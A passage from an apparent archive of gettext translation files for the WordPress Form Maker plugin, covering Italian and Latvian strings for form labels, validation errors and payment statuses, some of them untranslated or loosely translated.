#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "novembre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Dicembre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Errore, codice di protezione errato."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Il tuo ip è nella lista nera. Si prega di contattare l'amministratore del "
"sito. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Il file supera la dimensione consentita di"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Spiacenti, non sei autorizzato a caricare questo tipo di file."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Errore, il file non possono essere spostati."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Questo campo %s richiede una voce unica e questo valore è stato già "
"presentato."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Errore, e-mail non è stato inviato."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Nulla è stato presentato."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Il modulo è stato inviato correttamente."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Errore, e-mail non è stato inviato."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Il tuo indirizzo e-mail è già verificato."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Il tuo indirizzo email è stato verificato con successo."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "La verifica e-mail è scaduto."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Link di verifica non è valido."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "campo è obbligatorio."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Questo non è un indirizzo email valido."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"Non è possibile selezionare le date precedenti. Scegliere una data a "
"partire da quello in corso."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "L'"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "valore deve essere compreso tra "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Quantità"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Il tuo punteggio deve essere inferiore a "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Titolo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr ".first"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "L'anno"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Centrale"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "Prefisso teleselettivo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Telefono"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dollari. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cents. "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "Da"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "Per"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "andare "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "reset "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Selezionare un campo "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Seleziona una data"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-lv.po000060400000056775152434416630011643 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:00+0400\n"
"PO-Revision-Date: 2015-05-22 17:00+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: lv\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "Iela"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "Adrese līnija 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "Pilsēta"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "Valsts / Rajons / reģions"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "Pasta / Zip kods"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "Valsts"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "Janvāris"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "Februāris"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "Marts"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "Aprīlis"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Maijs"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Jūnijs"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Jūlijs"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Augusts"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "Septembris"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "Oktobris"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "Novembris"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Decembris"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Kļūda, nepareizu drošības kodu."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Jūsu ip ir melnajā sarakstā. Lūdzu, sazinieties ar vietnes administratoru"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "Fails pārsniedz pieļaujamo lielumu"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Atvainojiet, Jums nav atļauts augšupielādēt šo faila tipu."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Kļūda, fails nevar pārvietot."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Šis lauks %s nepieciešams unikāls ieraksts un šī vērtība jau bija iesniegts."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Kļūda, e-pasts nav nosūtīts."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Nekas netika iesniegts."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "Veidlapas tika iesniegta veiksmīgi."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Kļūda, e-pasts nav nosūtīts."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Jūsu e-pasta adrese jau ir pārbaudīta."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Jūsu e-pasts ir veiksmīgi pārbaudīta."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Jūsu e-pasta pārbaude ir beigusies."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Pārbaude saite ir nederīgs."

